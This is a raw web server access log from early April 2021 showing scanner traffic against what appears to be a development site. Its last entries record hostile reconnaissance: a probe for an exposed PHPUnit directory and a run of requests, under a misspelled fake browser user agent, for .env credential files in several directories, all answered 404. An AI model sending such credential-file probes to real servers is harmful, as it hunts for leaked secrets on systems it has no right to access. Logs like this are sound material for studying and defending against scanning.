104.143.83.241 - - [02/Apr/2021:05:56:55 -0400] "GET / HTTP/2.0" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
138.246.253.24 - - [02/Apr/2021:10:44:17 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
35.223.197.125 - - [02/Apr/2021:10:55:22 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0"
104.143.83.241 - - [03/Apr/2021:05:26:31 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
2001:4ca0:108:42::24 - - [03/Apr/2021:09:05:41 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
2001:4ca0:108:42::24 - - [03/Apr/2021:15:35:56 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [04/Apr/2021:05:25:52 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [05/Apr/2021:05:26:57 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [06/Apr/2021:05:25:48 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
165.227.116.116 - - [06/Apr/2021:05:52:15 -0400] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; [email protected])"
165.227.216.108 - - [06/Apr/2021:06:23:11 -0400] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; [email protected])"
104.143.83.241 - - [07/Apr/2021:05:26:14 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
82.165.48.181 - - [07/Apr/2021:17:33:23 -0400] "GET //vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
138.246.253.24 - - [07/Apr/2021:22:54:21 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [08/Apr/2021:05:25:09 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
135.181.222.124 - - [08/Apr/2021:07:42:58 -0400] "GET / HTTP/1.1" 200 5031 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
135.181.222.124 - - [08/Apr/2021:07:51:07 -0400] "GET /.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
135.181.222.124 - - [08/Apr/2021:08:13:24 -0400] "GET /admin/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
135.181.222.124 - - [08/Apr/2021:08:25:28 -0400] "GET /vendor/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
135.181.222.124 - - [08/Apr/2021:08:35:03 -0400] "GET /sites/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
135.181.222.124 - - [08/Apr/2021:08:41:22 -0400] "GET /blog/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
